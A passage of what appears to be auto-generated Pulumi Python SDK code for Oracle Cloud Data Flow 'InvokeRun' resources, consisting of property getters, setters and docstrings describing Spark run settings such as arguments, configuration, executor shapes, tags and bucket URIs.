:param pulumi.Input[Sequence[pulumi.Input['InvokeRunParameterArgs']]] parameters: An array of name/value pairs used to fill placeholders found in properties like `Application.arguments`. The name must be a string of one or more word characters (a-z, A-Z, 0-9, _). The value can be a string of 0 or more characters of any kind. Example: [ { name: "iterations", value: "10"}, { name: "input_file", value: "mydata.xml" }, { name: "variable_x", value: "${x}"} ]
:param pulumi.Input[str] spark_version: The Spark version utilized to run the application. This value may be set if applicationId is not since the Spark version will be taken from the associated application.
:param pulumi.Input[str] warehouse_bucket_uri: An Oracle Cloud Infrastructure URI of the bucket to be used as default warehouse directory for BATCH SQL runs. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
pulumi.set(__self__, "compartment_id", compartment_id)
if application_id is not None:
pulumi.set(__self__, "application_id", application_id)
if archive_uri is not None:
pulumi.set(__self__, "archive_uri", archive_uri)
if arguments is not None:
pulumi.set(__self__, "arguments", arguments)
if asynchronous is not None:
pulumi.set(__self__, "asynchronous", asynchronous)
if configuration is not None:
pulumi.set(__self__, "configuration", configuration)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if driver_shape is not None:
pulumi.set(__self__, "driver_shape", driver_shape)
if execute is not None:
pulumi.set(__self__, "execute", execute)
if executor_shape is not None:
pulumi.set(__self__, "executor_shape", executor_shape)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if logs_bucket_uri is not None:
pulumi.set(__self__, "logs_bucket_uri", logs_bucket_uri)
if metastore_id is not None:
pulumi.set(__self__, "metastore_id", metastore_id)
if num_executors is not None:
pulumi.set(__self__, "num_executors", num_executors)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if spark_version is not None:
pulumi.set(__self__, "spark_version", spark_version)
if warehouse_bucket_uri is not None:
pulumi.set(__self__, "warehouse_bucket_uri", warehouse_bucket_uri)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Input[str]:
"""
(Updatable) The OCID of a compartment.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: pulumi.Input[str]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="applicationId")
def application_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of the associated application. If this value is set, then no value for the execute parameter is required. If this value is not set, then a value for the execute parameter is required, and a new application is created and associated with the new run.
"""
return pulumi.get(self, "application_id")
@application_id.setter
def application_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "application_id", value)
@property
@pulumi.getter(name="archiveUri")
def archive_uri(self) -> Optional[pulumi.Input[str]]:
"""
An Oracle Cloud Infrastructure URI of an archive.zip file containing custom dependencies that may be used to support the execution a Python, Java, or Scala application. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "archive_uri")
@archive_uri.setter
def archive_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "archive_uri", value)
@property
@pulumi.getter
def arguments(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The arguments passed to the running application as command line arguments. An argument is either a plain text or a placeholder. Placeholders are replaced using values from the parameters map. Each placeholder specified must be represented in the parameters map else the request (POST or PUT) will fail with a HTTP 400 status code. Placeholders are specified as `Service Api Spec`, where `name` is the name of the parameter. Example: `[ "--input", "${input_file}", "--name", "John Doe" ]` If "input_file" has a value of "mydata.xml", then the value above will be translated to `--input mydata.xml --name "John Doe"`
"""
return pulumi.get(self, "arguments")
@arguments.setter
def arguments(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "arguments", value)
@property
@pulumi.getter
def asynchronous(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "asynchronous")
@asynchronous.setter
def asynchronous(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "asynchronous", value)
@property
@pulumi.getter
def configuration(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
The Spark configuration passed to the running process. See https://spark.apache.org/docs/latest/configuration.html#available-properties Example: { "spark.app.name" : "My App Name", "spark.shuffle.io.maxRetries" : "4" } Note: Not all Spark properties are permitted to be set. Attempting to set a property that is not allowed to be overwritten will cause a 400 status to be returned.
"""
return pulumi.get(self, "configuration")
@configuration.setter
def configuration(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "configuration", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
A user-friendly name that does not have to be unique. Avoid entering confidential information. If this value is not specified, it will be derived from the associated application's displayName or set by API using fileUri's application file name.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="driverShape")
def driver_shape(self) -> Optional[pulumi.Input[str]]:
"""
The VM shape for the driver. Sets the driver cores and memory.
"""
return pulumi.get(self, "driver_shape")
@driver_shape.setter
def driver_shape(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "driver_shape", value)
@property
@pulumi.getter
def execute(self) -> Optional[pulumi.Input[str]]:
"""
The input used for spark-submit command. For more details see https://spark.apache.org/docs/latest/submitting-applications.html#launching-applications-with-spark-submit. Supported options include ``--class``, ``--file``, ``--jars``, ``--conf``, ``--py-files``, and main application file with arguments. Example: ``--jars oci://path/to/a.jar,oci://path/to/b.jar --files oci://path/to/a.json,oci://path/to/b.csv --py-files oci://path/to/a.py,oci://path/to/b.py --conf spark.sql.crossJoin.enabled=true --class org.apache.spark.examples.SparkPi oci://path/to/main.jar 10`` Note: If execute is specified together with applicationId, className, configuration, fileUri, language, arguments, parameters during application create/update, or run create/submit, Data Flow service will use derived information from execute input only.
"""
return pulumi.get(self, "execute")
@execute.setter
def execute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "execute", value)
@property
@pulumi.getter(name="executorShape")
def executor_shape(self) -> Optional[pulumi.Input[str]]:
"""
The VM shape for the executors. Sets the executor cores and memory.
"""
return pulumi.get(self, "executor_shape")
@executor_shape.setter
def executor_shape(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "executor_shape", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="logsBucketUri")
def logs_bucket_uri(self) -> Optional[pulumi.Input[str]]:
"""
An Oracle Cloud Infrastructure URI of the bucket where the Spark job logs are to be uploaded. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "logs_bucket_uri")
@logs_bucket_uri.setter
def logs_bucket_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logs_bucket_uri", value)
@property
@pulumi.getter(name="metastoreId")
def metastore_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of Oracle Cloud Infrastructure Hive Metastore.
"""
return pulumi.get(self, "metastore_id")
@metastore_id.setter
def metastore_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "metastore_id", value)
@property
@pulumi.getter(name="numExecutors")
def num_executors(self) -> Optional[pulumi.Input[int]]:
"""
The number of executor VMs requested.
"""
return pulumi.get(self, "num_executors")
@num_executors.setter
def num_executors(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "num_executors", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InvokeRunParameterArgs']]]]:
"""
An array of name/value pairs used to fill placeholders found in properties like `Application.arguments`. The name must be a string of one or more word characters (a-z, A-Z, 0-9, _). The value can be a string of 0 or more characters of any kind. Example: [ { name: "iterations", value: "10"}, { name: "input_file", value: "mydata.xml" }, { name: "variable_x", value: "${x}"} ]
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['InvokeRunParameterArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="sparkVersion")
def spark_version(self) -> Optional[pulumi.Input[str]]:
"""
The Spark version utilized to run the application. This value may be set if applicationId is not since the Spark version will be taken from the associated application.
"""
return pulumi.get(self, "spark_version")
@spark_version.setter
def spark_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "spark_version", value)
@property
@pulumi.getter(name="warehouseBucketUri")
def warehouse_bucket_uri(self) -> Optional[pulumi.Input[str]]:
"""
An Oracle Cloud Infrastructure URI of the bucket to be used as default warehouse directory for BATCH SQL runs. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "warehouse_bucket_uri")
@warehouse_bucket_uri.setter
def warehouse_bucket_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "warehouse_bucket_uri", value)
@pulumi.input_type
class _InvokeRunState:
def __init__(__self__, *,
application_id: Optional[pulumi.Input[str]] = None,
archive_uri: Optional[pulumi.Input[str]] = None,
arguments: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
asynchronous: Optional[pulumi.Input[bool]] = None,
class_name: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
configuration: Optional[pulumi.Input[Mapping[str, Any]]] = None,
data_read_in_bytes: Optional[pulumi.Input[str]] = None,
data_written_in_bytes: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
driver_shape: Optional[pulumi.Input[str]] = None,
execute: Optional[pulumi.Input[str]] = None,
executor_shape: Optional[pulumi.Input[str]] = None,
file_uri: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
language: Optional[pulumi.Input[str]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
logs_bucket_uri: Optional[pulumi.Input[str]] = None,
metastore_id: Optional[pulumi.Input[str]] = None,
num_executors: Optional[pulumi.Input[int]] = None,
opc_request_id: Optional[pulumi.Input[str]] = None,
owner_principal_id: Optional[pulumi.Input[str]] = None,
owner_user_name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Sequence[pulumi.Input['InvokeRunParameterArgs']]]] = None,
private_endpoint_dns_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
private_endpoint_id: Optional[pulumi.Input[str]] = None,
private_endpoint_max_host_count: Optional[pulumi.Input[int]] = None,
private_endpoint_nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
private_endpoint_subnet_id: Optional[pulumi.Input[str]] = None,
run_duration_in_milliseconds: Optional[pulumi.Input[str]] = None,
spark_version: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None,
total_ocpu: Optional[pulumi.Input[int]] = None,
warehouse_bucket_uri: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering InvokeRun resources.
:param pulumi.Input[str] application_id: The OCID of the associated application. If this value is set, then no value for the execute parameter is required. If this value is not set, then a value for the execute parameter is required, and a new application is created and associated with the new run.
:param pulumi.Input[str] archive_uri: An Oracle Cloud Infrastructure URI of an archive.zip file containing custom dependencies that may be used to support the execution a Python, Java, or Scala application. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[Sequence[pulumi.Input[str]]] arguments: The arguments passed to the running application as command line arguments. An argument is either a plain text or a placeholder. Placeholders are replaced using values from the parameters map. Each placeholder specified must be represented in the parameters map else the request (POST or PUT) will fail with a HTTP 400 status code. Placeholders are specified as `Service Api Spec`, where `name` is the name of the parameter. Example: `[ "--input", "${input_file}", "--name", "John Doe" ]` If "input_file" has a value of "mydata.xml", then the value above will be translated to `--input mydata.xml --name "John Doe"`
:param pulumi.Input[str] class_name: The class for the application.
:param pulumi.Input[str] compartment_id: (Updatable) The OCID of a compartment.
:param pulumi.Input[Mapping[str, Any]] configuration: The Spark configuration passed to the running process. See https://spark.apache.org/docs/latest/configuration.html#available-properties Example: { "spark.app.name" : "My App Name", "spark.shuffle.io.maxRetries" : "4" } Note: Not all Spark properties are permitted to be set. Attempting to set a property that is not allowed to be overwritten will cause a 400 status to be returned.
:param pulumi.Input[str] data_read_in_bytes: The data read by the run in bytes.
:param pulumi.Input[str] data_written_in_bytes: The data written by the run in bytes.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
:param pulumi.Input[str] display_name: A user-friendly name that does not have to be unique. Avoid entering confidential information. If this value is not specified, it will be derived from the associated application's displayName or set by API using fileUri's application file name.
:param pulumi.Input[str] driver_shape: The VM shape for the driver. Sets the driver cores and memory.
:param pulumi.Input[str] execute: The input used for spark-submit command. For more details see https://spark.apache.org/docs/latest/submitting-applications.html#launching-applications-with-spark-submit. Supported options include ``--class``, ``--file``, ``--jars``, ``--conf``, ``--py-files``, and main application file with arguments. Example: ``--jars oci://path/to/a.jar,oci://path/to/b.jar --files oci://path/to/a.json,oci://path/to/b.csv --py-files oci://path/to/a.py,oci://path/to/b.py --conf spark.sql.crossJoin.enabled=true --class org.apache.spark.examples.SparkPi oci://path/to/main.jar 10`` Note: If execute is specified together with applicationId, className, configuration, fileUri, language, arguments, parameters during application create/update, or run create/submit, Data Flow service will use derived information from execute input only.
:param pulumi.Input[str] executor_shape: The VM shape for the executors. Sets the executor cores and memory.
:param pulumi.Input[str] file_uri: An Oracle Cloud Infrastructure URI of the file containing the application to execute. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] language: The Spark language.
:param pulumi.Input[str] lifecycle_details: The detailed messages about the lifecycle state.
:param pulumi.Input[str] logs_bucket_uri: An Oracle Cloud Infrastructure URI of the bucket where the Spark job logs are to be uploaded. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[str] metastore_id: The OCID of Oracle Cloud Infrastructure Hive Metastore.
:param pulumi.Input[int] num_executors: The number of executor VMs requested.
:param pulumi.Input[str] opc_request_id: Unique Oracle assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param pulumi.Input[str] owner_principal_id: The OCID of the user who created the resource.
:param pulumi.Input[str] owner_user_name: The username of the user who created the resource. If the username of the owner does not exist, `null` will be returned and the caller should refer to the ownerPrincipalId value instead.
:param pulumi.Input[Sequence[pulumi.Input['InvokeRunParameterArgs']]] parameters: An array of name/value pairs used to fill placeholders found in properties like `Application.arguments`. The name must be a string of one or more word characters (a-z, A-Z, 0-9, _). The value can be a string of 0 or more characters of any kind. Example: [ { name: "iterations", value: "10"}, { name: "input_file", value: "mydata.xml" }, { name: "variable_x", value: "${x}"} ]
:param pulumi.Input[Sequence[pulumi.Input[str]]] private_endpoint_dns_zones: An array of DNS zone names. Example: `[ "app.examplecorp.com", "app.examplecorp2.com" ]`
:param pulumi.Input[str] private_endpoint_id: The OCID of a private endpoint.
:param pulumi.Input[int] private_endpoint_max_host_count: The maximum number of hosts to be accessed through the private endpoint. This value is used to calculate the relevant CIDR block and should be a multiple of 256. If the value is not a multiple of 256, it is rounded up to the next multiple of 256. For example, 300 is rounded up to 512.
:param pulumi.Input[Sequence[pulumi.Input[str]]] private_endpoint_nsg_ids: An array of network security group OCIDs.
:param pulumi.Input[str] private_endpoint_subnet_id: The OCID of a subnet.
:param pulumi.Input[str] run_duration_in_milliseconds: The duration of the run in milliseconds.
:param pulumi.Input[str] spark_version: The Spark version utilized to run the application. This value may be set if applicationId is not since the Spark version will be taken from the associated application.
:param pulumi.Input[str] state: The current state of this run.
:param pulumi.Input[str] time_created: The date and time a application was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2018-04-03T21:10:29.600Z`
:param pulumi.Input[str] time_updated: The date and time a application was updated, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2018-04-03T21:10:29.600Z`
:param pulumi.Input[int] total_ocpu: The total number of oCPU requested by the run.
:param pulumi.Input[str] warehouse_bucket_uri: An Oracle Cloud Infrastructure URI of the bucket to be used as default warehouse directory for BATCH SQL runs. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
if application_id is not None:
pulumi.set(__self__, "application_id", application_id)
if archive_uri is not None:
pulumi.set(__self__, "archive_uri", archive_uri)
if arguments is not None:
pulumi.set(__self__, "arguments", arguments)
if asynchronous is not None:
pulumi.set(__self__, "asynchronous", asynchronous)
if class_name is not None:
pulumi.set(__self__, "class_name", class_name)
if compartment_id is not None:
pulumi.set(__self__, "compartment_id", compartment_id)
if configuration is not None:
pulumi.set(__self__, "configuration", configuration)
if data_read_in_bytes is not None:
pulumi.set(__self__, "data_read_in_bytes", data_read_in_bytes)
if data_written_in_bytes is not None:
pulumi.set(__self__, "data_written_in_bytes", data_written_in_bytes)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if driver_shape is not None:
pulumi.set(__self__, "driver_shape", driver_shape)
if execute is not None:
pulumi.set(__self__, "execute", execute)
if executor_shape is not None:
pulumi.set(__self__, "executor_shape", executor_shape)
if file_uri is not None:
pulumi.set(__self__, "file_uri", file_uri)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if language is not None:
pulumi.set(__self__, "language", language)
if lifecycle_details is not None:
pulumi.set(__self__, "lifecycle_details", lifecycle_details)
if logs_bucket_uri is not None:
pulumi.set(__self__, "logs_bucket_uri", logs_bucket_uri)
if metastore_id is not None:
pulumi.set(__self__, "metastore_id", metastore_id)
if num_executors is not None:
pulumi.set(__self__, "num_executors", num_executors)
if opc_request_id is not None:
pulumi.set(__self__, "opc_request_id", opc_request_id)
if owner_principal_id is not None:
pulumi.set(__self__, "owner_principal_id", owner_principal_id)
if owner_user_name is not None:
pulumi.set(__self__, "owner_user_name", owner_user_name)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if private_endpoint_dns_zones is not None:
pulumi.set(__self__, "private_endpoint_dns_zones", private_endpoint_dns_zones)
if private_endpoint_id is not None:
pulumi.set(__self__, "private_endpoint_id", private_endpoint_id)
if private_endpoint_max_host_count is not None:
pulumi.set(__self__, "private_endpoint_max_host_count", private_endpoint_max_host_count)
if private_endpoint_nsg_ids is not None:
pulumi.set(__self__, "private_endpoint_nsg_ids", private_endpoint_nsg_ids)
if private_endpoint_subnet_id is not None:
pulumi.set(__self__, "private_endpoint_subnet_id", private_endpoint_subnet_id)
if run_duration_in_milliseconds is not None:
pulumi.set(__self__, "run_duration_in_milliseconds", run_duration_in_milliseconds)
if spark_version is not None:
pulumi.set(__self__, "spark_version", spark_version)
if state is not None:
pulumi.set(__self__, "state", state)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
if time_updated is not None:
pulumi.set(__self__, "time_updated", time_updated)
if total_ocpu is not None:
pulumi.set(__self__, "total_ocpu", total_ocpu)
if warehouse_bucket_uri is not None:
pulumi.set(__self__, "warehouse_bucket_uri", warehouse_bucket_uri)
@property
@pulumi.getter(name="applicationId")
def application_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of the associated application. If this value is set, then no value for the execute parameter is required. If this value is not set, then a value for the execute parameter is required, and a new application is created and associated with the new run.
"""
return pulumi.get(self, "application_id")
@application_id.setter
def application_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "application_id", value)
@property
@pulumi.getter(name="archiveUri")
def archive_uri(self) -> Optional[pulumi.Input[str]]:
"""
An Oracle Cloud Infrastructure URI of an archive.zip file containing custom dependencies that may be used to support the execution a Python, Java, or Scala application. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "archive_uri")
@archive_uri.setter
def archive_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "archive_uri", value)
@property
@pulumi.getter
def arguments(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The arguments passed to the running application as command line arguments. An argument is either a plain text or a placeholder. Placeholders are replaced using values from the parameters map. Each placeholder specified must be represented in the parameters map else the request (POST or PUT) will fail with a HTTP 400 status code. Placeholders are specified as `Service Api Spec`, where `name` is the name of the parameter. Example: `[ "--input", "${input_file}", "--name", "John Doe" ]` If "input_file" has a value of "mydata.xml", then the value above will be translated to `--input mydata.xml --name "John Doe"`
"""
return pulumi.get(self, "arguments")
@arguments.setter
def arguments(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "arguments", value)
@property
@pulumi.getter
def asynchronous(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "asynchronous")
@asynchronous.setter
def asynchronous(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "asynchronous", value)
@property
@pulumi.getter(name="className")
def class_name(self) -> Optional[pulumi.Input[str]]:
"""
The class for the application.
"""
return pulumi.get(self, "class_name")
@class_name.setter
def class_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "class_name", value)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of a compartment.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter
def configuration(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
The Spark configuration passed to the running process. See https://spark.apache.org/docs/latest/configuration.html#available-properties Example: { "spark.app.name" : "My App Name", "spark.shuffle.io.maxRetries" : "4" } Note: Not all Spark properties are permitted to be set. Attempting to set a property that is not allowed to be overwritten will cause a 400 status to be returned.
"""
return pulumi.get(self, "configuration")
@configuration.setter
def configuration(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "configuration", value)
@property
@pulumi.getter(name="dataReadInBytes")
def data_read_in_bytes(self) -> Optional[pulumi.Input[str]]:
"""
The data read by the run in bytes.
"""
return pulumi.get(self, "data_read_in_bytes")
@data_read_in_bytes.setter
def data_read_in_bytes(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_read_in_bytes", value)
@property
@pulumi.getter(name="dataWrittenInBytes")
def data_written_in_bytes(self) -> Optional[pulumi.Input[str]]:
"""
The data written by the run in bytes.
"""
return pulumi.get(self, "data_written_in_bytes")
@data_written_in_bytes.setter
def data_written_in_bytes(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_written_in_bytes", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
A user-friendly name that does not have to be unique. Avoid entering confidential information. If this value is not specified, it will be derived from the associated application's displayName or set by API using fileUri's application file name.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="driverShape")
def driver_shape(self) -> Optional[pulumi.Input[str]]:
"""
The VM shape for the driver. Sets the driver cores and memory.
"""
return pulumi.get(self, "driver_shape")
@driver_shape.setter
def driver_shape(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "driver_shape", value)
@property
@pulumi.getter
def execute(self) -> Optional[pulumi.Input[str]]:
"""
The input used for spark-submit command. For more details see https://spark.apache.org/docs/latest/submitting-applications.html#launching-applications-with-spark-submit. Supported options include ``--class``, ``--file``, ``--jars``, ``--conf``, ``--py-files``, and main application file with arguments. Example: ``--jars oci://path/to/a.jar,oci://path/to/b.jar --files oci://path/to/a.json,oci://path/to/b.csv --py-files oci://path/to/a.py,oci://path/to/b.py --conf spark.sql.crossJoin.enabled=true --class org.apache.spark.examples.SparkPi oci://path/to/main.jar 10`` Note: If execute is specified together with applicationId, className, configuration, fileUri, language, arguments, parameters during application create/update, or run create/submit, Data Flow service will use derived information from execute input only.
"""
return pulumi.get(self, "execute")
@execute.setter
def execute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "execute", value)
@property
@pulumi.getter(name="executorShape")
def executor_shape(self) -> Optional[pulumi.Input[str]]:
"""
The VM shape for the executors. Sets the executor cores and memory.
"""
return pulumi.get(self, "executor_shape")
@executor_shape.setter
def executor_shape(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "executor_shape", value)
@property
@pulumi.getter(name="fileUri")
def file_uri(self) -> Optional[pulumi.Input[str]]:
"""
An Oracle Cloud Infrastructure URI of the file containing the application to execute. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "file_uri")
@file_uri.setter
def file_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "file_uri", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter
def language(self) -> Optional[pulumi.Input[str]]:
"""
The Spark language.
"""
return pulumi.get(self, "language")
@language.setter
def language(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "language", value)
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> Optional[pulumi.Input[str]]:
"""
The detailed messages about the lifecycle state.
"""
return pulumi.get(self, "lifecycle_details")
@lifecycle_details.setter
def lifecycle_details(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "lifecycle_details", value)
@property
@pulumi.getter(name="logsBucketUri")
def logs_bucket_uri(self) -> Optional[pulumi.Input[str]]:
"""
An Oracle Cloud Infrastructure URI of the bucket where the Spark job logs are to be uploaded. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "logs_bucket_uri")
@logs_bucket_uri.setter
def logs_bucket_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logs_bucket_uri", value)
@property
@pulumi.getter(name="metastoreId")
def metastore_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of Oracle Cloud Infrastructure Hive Metastore.
"""
return pulumi.get(self, "metastore_id")
@metastore_id.setter
def metastore_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "metastore_id", value)
@property
@pulumi.getter(name="numExecutors")
def num_executors(self) -> Optional[pulumi.Input[int]]:
"""
The number of executor VMs requested.
"""
return pulumi.get(self, "num_executors")
@num_executors.setter
def num_executors(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "num_executors", value)
@property
@pulumi.getter(name="opcRequestId")
def opc_request_id(self) -> Optional[pulumi.Input[str]]:
"""
Unique Oracle assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
"""
return pulumi.get(self, "opc_request_id")
@opc_request_id.setter
def opc_request_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "opc_request_id", value)
@property
@pulumi.getter(name="ownerPrincipalId")
def owner_principal_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of the user who created the resource.
"""
return pulumi.get(self, "owner_principal_id")
@owner_principal_id.setter
def owner_principal_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "owner_principal_id", value)
@property
@pulumi.getter(name="ownerUserName")
def owner_user_name(self) -> Optional[pulumi.Input[str]]:
"""
